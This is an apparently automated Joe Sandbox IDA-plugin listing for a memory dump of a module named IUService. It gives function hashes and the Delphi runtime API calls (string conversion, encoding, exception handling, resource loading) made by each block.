                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@Sysutils@Unicode$Exception@$bctr$qqrp20Recxi$Asg$qqrr20CharClassClassoCreate$qqrp17ErrorExcept$qqrvFormatFormat$qqrx20FromLen$qqrr20LoadMessageMessage$qqruiMetaRaiseRecpx14String$qqrp20StringpbiStringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1617757611-0
                                                                                                                                            • Opcode ID: 34b26c9ffda536621193965357a84d2c17b85b6f44bcd05500fd26bb6e704703
                                                                                                                                            • Instruction ID: 9c2c5285b6efc6558c6871cf73d9fb702bd57b1419b1abeba3fe6d9365420b74
                                                                                                                                            • Opcode Fuzzy Hash: 34b26c9ffda536621193965357a84d2c17b85b6f44bcd05500fd26bb6e704703
                                                                                                                                            • Instruction Fuzzy Hash: E201DB74A056869FD714CFA5FC809AEB7F9EB59300F51863AE900E3351DB309D40C7A1
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028338,?,?,00000001,?,?,50026115,00000000,50026237,?,?,?,?,00000000,00000000), ref: 500282F2
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50028338,?,?,00000001,?,?,50026115,00000000,50026237,?,?,?,?,00000000,00000000), ref: 5002830D
                                                                                                                                            • @Sysutils@StrCharLength$qqrpxb.RTL120(00000000,50028338,?,?,00000001,?,?,50026115,00000000,50026237,?,?,?,?,00000000,00000000), ref: 5002831B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$CharChar$qqrx20InternalLength$qqrpxbSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3042977434-0
                                                                                                                                            • Opcode ID: 6379ca91532523d5bce16a0909a6e0df30a6d0f000e913d4fb421b896347fca2
                                                                                                                                            • Instruction ID: 47000205c57155a74c5d18828630aa859fd0bb08eddc99539042e8fa57d804a7
                                                                                                                                            • Opcode Fuzzy Hash: 6379ca91532523d5bce16a0909a6e0df30a6d0f000e913d4fb421b896347fca2
                                                                                                                                            • Instruction Fuzzy Hash: 6101DF34A131C6EFEB00DBA8E91289DB3FAEF94600BA182B2E50093614E7349F00D390
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120(00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 5002847E
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,500284EE,?,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284AE
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500284EE,?,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284C7
                                                                                                                                            • @Sysutils@StrCharLength$qqrpxc.RTL120(00000000,500284EE,?,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284CF
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(500284F5,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284E8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$CharChar$qqrx27Clr$qqrpvInternalLength$qqrpxcRef$qqrpvSysutils@T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2156883435-0
                                                                                                                                            • Opcode ID: a3c48d0067439e3e87823feac1d7b494006b287914f12001d4e96a8a66b71b4b
                                                                                                                                            • Instruction ID: 715662b57516d9754a6f786f41bd808451b406471416e7d906745c201c20a256
                                                                                                                                            • Opcode Fuzzy Hash: a3c48d0067439e3e87823feac1d7b494006b287914f12001d4e96a8a66b71b4b
                                                                                                                                            • Instruction Fuzzy Hash: C801DF30A0618AEF9B10EFB1ED6286DB3F9FB4420079146B6E800D3251E738EE0097A0
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 5001D8EE
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5001D956), ref: 5001D91B
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001D956), ref: 5001D92E
                                                                                                                                            • @Sysutils@StrLCopy$qqrpcpxcui.RTL120(00000000,5001D956), ref: 5001D939
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5001D95D), ref: 5001D950
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002E0F3
                                                                                                                                            • GetCPInfo.KERNEL32(5002E1B0,?,00000000), ref: 5002E113
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002E1B0,?,00000000), ref: 5002E129
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(5002E1B0,?,00000000), ref: 5002E12E
                                                                                                                                            • @System@@AfterConstruction$qqrp14System@TObject.RTL120(5002E1B0,?,00000000), ref: 5002E146
                                                                                                                                            APIs
                                                                                                                                            • @System@@LStrAddRef$qqrpv.RTL120 ref: 50028356
                                                                                                                                            • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,500283C6), ref: 50028388
                                                                                                                                              • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500283C6), ref: 500283A1
                                                                                                                                            • @Sysutils@StrCharLength$qqrpxc.RTL120(00000000,500283C6), ref: 500283A9
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(500283CD), ref: 500283C0
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001D9D8), ref: 5001D99D
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001D9D8), ref: 5001D9B0
                                                                                                                                            • @Sysutils@StrLCopy$qqrpbpxbui.RTL120(00000000,5001D9D8), ref: 5001D9BB
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500269ED
                                                                                                                                            • @Sysutils@LoadStr$qqri.RTL120(?,00000000,50026A4E,?,?,?,?,00000000,00000000), ref: 50026A0F
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026A4E,?,?,?,?,00000000,00000000), ref: 50026A1D
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026A4E,?,?,?,?,00000000,00000000), ref: 50026A28
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 50026A89
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,00000000,50026AEA,?,?,?,?,00000000,00000000), ref: 50026AAB
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026AEA,?,?,?,?,00000000,00000000), ref: 50026AB9
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026AEA,?,?,?,?,00000000,00000000), ref: 50026AC4
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002672D
                                                                                                                                            • @Sysutils@LoadStr$qqri.RTL120(?,00000000,50026788,?,?,?,?,00000000,00000000), ref: 5002674F
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026788,?,?,?,?,00000000,00000000), ref: 5002675D
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026788,?,?,?,?,00000000,00000000), ref: 50026768
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@Sysutils@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20LoadMetaRecxiStr$qqriStringStringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2765079483-0
                                                                                                                                            • Opcode ID: 82797bbb40d43ac66670649aa24e2307c392cdea19954696096313799db10cbd
                                                                                                                                            • Instruction ID: beac2be98222c8cf5cd228bb1a13cdf081a6ca164530b3398e22c63253403a1c
                                                                                                                                            • Opcode Fuzzy Hash: 82797bbb40d43ac66670649aa24e2307c392cdea19954696096313799db10cbd
                                                                                                                                            • Instruction Fuzzy Hash: F0F0A4356052886BD700DA94EC92E9EB7ADEF99760F918362F90497340D635AE01C691
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                            • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                            • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$StringSystem@@$Asg$qqrr20ClassClassoCreate$qqrp17Format$qqrx20LoadMetaRecxiString$qqrp20Stringpx14Stringx20Sysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2968566035-0
                                                                                                                                            • Opcode ID: eb8dbeff97980f41212820df1590c374e9b04be7e90399179c1a7d1c7f44e779
                                                                                                                                            • Instruction ID: 59d3e7adbb39bbbd23096f0306fd7bc4bc599d625c45f80d349e960b686eec1b
                                                                                                                                            • Opcode Fuzzy Hash: eb8dbeff97980f41212820df1590c374e9b04be7e90399179c1a7d1c7f44e779
                                                                                                                                            • Instruction Fuzzy Hash: 58F0A9356016886BE710DA94EC52E9EB7ADDF85710F914372F90497341DA35AE01C6D1
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500105AC
                                                                                                                                            • @System@TObject@ClassName$qqrv.RTL120(00000000,50010608), ref: 500105C6
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,50010608), ref: 500105E8
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,50010608), ref: 500105ED
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$ClassSystem@@$ClassoCreate$qqrp17Except$qqrvException@$bctr$qqrp20MetaName$qqrvObject@RaiseRecpx14RecxiStringSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2276446640-0
                                                                                                                                            • Opcode ID: a47437a02414486e94db703e65b95041672a09583fc297ca935734f4a65545cb
                                                                                                                                            • Instruction ID: 7635616e979078c9aaefdf8b0fdb21b021419f1ddeeb6f58034bbde12a420e8e
                                                                                                                                            • Opcode Fuzzy Hash: a47437a02414486e94db703e65b95041672a09583fc297ca935734f4a65545cb
                                                                                                                                            • Instruction Fuzzy Hash: 6D01F934D04688AFE714CFA4ECA19AEB7B8EB45310F8083A6F854D3380E7315A00CA91
                                                                                                                                            APIs
                                                                                                                                            • @System@@DynArrayAddRef$qqrv.RTL120(?,?,00000000), ref: 5002D21E
                                                                                                                                            • @Sysutils@TEncoding@GetChars$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,?,00000000,5002D27D,?,?,?,00000000), ref: 5002D241
                                                                                                                                              • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002DC60
                                                                                                                                              • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002DC65
                                                                                                                                              • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DC88
                                                                                                                                              • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DC8D
                                                                                                                                              • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DCB0
                                                                                                                                              • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DCB5
                                                                                                                                              • Part of subcall function 5002DC38: @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002DCBC
                                                                                                                                              • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DCE1
                                                                                                                                              • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DCE6
                                                                                                                                              • Part of subcall function 5002DC38: @Sysutils@TEncoding@GetCharCount$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,?,?), ref: 5002DCF3
                                                                                                                                              • Part of subcall function 5002DC38: @System@@DynArraySetLength$qqrv.RTL120(?,?,?,?), ref: 5002DD0D
                                                                                                                                            • @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%.RTL120(?,?,00000000,5002D27D,?,?,?,00000000), ref: 5002D24E
                                                                                                                                              • Part of subcall function 5002D730: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%.RTL120(?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D73E
                                                                                                                                              • Part of subcall function 5002D730: @System@@DynArraySetLength$qqrv.RTL120(00000000,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D753
                                                                                                                                              • Part of subcall function 5002D730: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D75D
                                                                                                                                              • Part of subcall function 5002D730: @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%iir25System@%DynamicArray$tuc%i.RTL120(00000000,?,00000000), ref: 5002D76C
                                                                                                                                            • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D284,5002D27D,?,?,?,00000000), ref: 5002D269
                                                                                                                                              • Part of subcall function 5000C214: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C23F
                                                                                                                                              • Part of subcall function 5000C214: @System@@FreeMem$qqrpv.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C247
                                                                                                                                            • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D284,5002D27D,?,?,?,00000000), ref: 5002D277
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$Sysutils@$ArraySystem@$DynamicSystem@%$Encoding@$Except$qqrvException@$bctr$qqrp20Length$qqrvRaiseString$Recpx14Recxi$Array$tb%Array$tuc%iiBytes$qqrx24Clear$qqrrpvpv$Array$qqrpvt1uiArray$tb%iir25Array$tuc%iByteCharChars$qqrx25Count$qqrx24Count$qqrx25FinalizeFreeMem$qqrpvRef$qqrv
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 306697395-0
                                                                                                                                            • Opcode ID: 70b8e1b795e1d37dd9de12cc76fc3247445453c6de169292efa2efb0df9a22ae
                                                                                                                                            • Instruction ID: 5ec251f640e733fb77e8b4a269d7085e3b95d1142e22d4d9b3bdac147b7f947c
                                                                                                                                            • Opcode Fuzzy Hash: 70b8e1b795e1d37dd9de12cc76fc3247445453c6de169292efa2efb0df9a22ae
                                                                                                                                            • Instruction Fuzzy Hash: DB01AF74205649EFEB04CF94FC91C8E73E9EB5C710BA18266FD0493750D630EE06CAA0
                                                                                                                                            APIs
                                                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 5000E8A8
                                                                                                                                            • @System@@LStrFromPWChar$qqrr27System@%AnsiStringT$us$i0$%pbus.RTL120(00000000,5000E8E7,?,?,?,00000000), ref: 5000E8BB
                                                                                                                                            • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000E8E7,?,?,?,00000000), ref: 5000E8C3
                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 5000E8CA
                                                                                                                                            • @System@@LStrClr$qqrpv.RTL120(5000E8EE,?,?,00000000), ref: 5000E8E1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$AddressAnsiProcStringSystem@%$Char$qqrr27Char$qqrx27Clr$qqrpvFromT$us$i0$%T$us$i0$%pbus
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 500361E8
                                                                                                                                            • @Variants@@VarCopy$qqrr8TVarDatarx8TVarData.RTL120(00000000,50036242,?,?,50031CC6,?), ref: 50036200
                                                                                                                                            • @Variants@VarCastError$qqrxusxus.RTL120(?,?,50031CC6,?), ref: 5003621D
                                                                                                                                              • Part of subcall function 50030760: @Variants@VarTypeAsText$qqrxus.RTL120(00000000,500307EF), ref: 5003078A
                                                                                                                                              • Part of subcall function 50030760: @Variants@VarTypeAsText$qqrxus.RTL120(00000000,500307EF), ref: 5003079E
                                                                                                                                              • Part of subcall function 50030760: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000001,?,00000000,500307EF), ref: 500307BB
                                                                                                                                              • Part of subcall function 50030760: @Sysutils@Exception@$bctr$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000001,?,00000000,500307EF), ref: 500307CA
                                                                                                                                              • Part of subcall function 50030760: @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,500307EF), ref: 500307CF
                                                                                                                                            • @System@@IntfCopy$qqrr45System@%DelphiInterface$t17System@IInterface%x45System@%DelphiInterface$t17System@IInterface%.RTL120(?,?,50031CC6,?), ref: 50036227
                                                                                                                                            • @Variants@@VarClear$qqrr8TVarData.RTL120(50036249,?), ref: 5003623C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Variants@$DataDelphiInterface$t17System@%System@@Text$qqrxusTypeVariants@@$CastClear$qqrr8Copy$qqrr45Copy$qqrr8Datarx8Error$qqrxusxusExcept$qqrvException@$bctr$qqrx20InitInterface%Interface%x45IntfLoadRaiseRecxiStringString$qqrp20Stringpx14Sysutils@UnicodeVariant
                                                                                                                                            APIs
                                                                                                                                            • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002C0D9
                                                                                                                                            • @System@TObject@$bctr$qqrv.RTL120 ref: 5002C0E8
                                                                                                                                            • @Sysutils@TStringBuilder@set_Capacity$qqri.RTL120 ref: 5002C0F9
                                                                                                                                            • @Sysutils@TStringBuilder@Append$qqrx20System@UnicodeString.RTL120 ref: 5002C107
                                                                                                                                            • @System@@AfterConstruction$qqrp14System@TObject.RTL120 ref: 5002C112
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$String$System@@Sysutils@$AfterAppend$qqrx20Builder@Builder@set_Capacity$qqriClassClassoConstruction$qqrp14Create$qqrp17MetaObjectObject@$bctr$qqrvUnicode
                                                                                                                                            APIs
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                                                              • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                                                            • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$StringSystem@System@@$EnsureString$qqrr20$AnsiFromInternalLen$qqrx20Str$qqrr20Stringx27System@%T$us$i0$%
                                                                                                                                            APIs
                                                                                                                                            • @System@@DynArrayAddRef$qqrv.RTL120(?,?,00000000), ref: 5002D1AA
                                                                                                                                            • @Sysutils@TEncoding@GetChars$qqrx25System@%DynamicArray$tuc%.RTL120(00000000,5002D201,?,?,?,00000000), ref: 5002D1C5
                                                                                                                                              • Part of subcall function 5002DC14: @System@@DynArrayLength$qqrv.RTL120(?,?,?,5002D1CA,00000000,5002D201,?,?,?,00000000), ref: 5002DC1F
                                                                                                                                              • Part of subcall function 5002DC14: @Sysutils@TEncoding@GetChars$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,00000000,?,?,?,5002D1CA,00000000,5002D201,?,?,?,00000000), ref: 5002DC2C
                                                                                                                                            • @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%.RTL120(00000000,5002D201,?,?,?,00000000), ref: 5002D1D2
                                                                                                                                              • Part of subcall function 5002D730: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%.RTL120(?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D73E
                                                                                                                                              • Part of subcall function 5002D730: @System@@DynArraySetLength$qqrv.RTL120(00000000,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D753
                                                                                                                                              • Part of subcall function 5002D730: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D75D
                                                                                                                                              • Part of subcall function 5002D730: @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%iir25System@%DynamicArray$tuc%i.RTL120(00000000,?,00000000), ref: 5002D76C
                                                                                                                                            • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D208,?,?,00000000), ref: 5002D1ED
                                                                                                                                              • Part of subcall function 5000C214: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C23F
                                                                                                                                              • Part of subcall function 5000C214: @System@@FreeMem$qqrpv.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C247
                                                                                                                                            • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D208,?,?,00000000), ref: 5002D1FB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$ArrayDynamicSystem@%$Encoding@Sysutils@$Length$qqrv$Array$tb%Bytes$qqrx24Chars$qqrx25Clear$qqrrpvpv$Array$qqrpvt1uiArray$tb%iir25Array$tuc%Array$tuc%iArray$tuc%iiByteCount$qqrx24FinalizeFreeMem$qqrpvRef$qqrv
                                                                                                                                            APIs
                                                                                                                                            • @System@@InitializeRecord$qqrpvt1.RTL120 ref: 5001B905
                                                                                                                                              • Part of subcall function 5000AE00: @System@@InitializeArray$qqrpvt1ui.RTL120 ref: 5000AE24
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B958), ref: 5001B920
                                                                                                                                            • @System@EnumResourceModules$qqrpqqripv$opv.RTL120(00000000,5001B958), ref: 5001B92D
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B958), ref: 5001B937
                                                                                                                                            • @System@@FinalizeRecord$qqrpvt1.RTL120(5001B95F), ref: 5001B952
                                                                                                                                              • Part of subcall function 5000AED8: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,?,?,50006C67,?,?,50006BAA), ref: 5000AEFC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@@$System@$Unicode$Array$qqrpvt1uiAsg$qqrr20FinalizeInitializeRecord$qqrpvt1StringStringx20$EnumModules$qqrpqqripv$opvResource
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2269274692-0
                                                                                                                                            APIs
                                                                                                                                            • @System@@FillChar$qqrpvib.RTL120 ref: 50003991
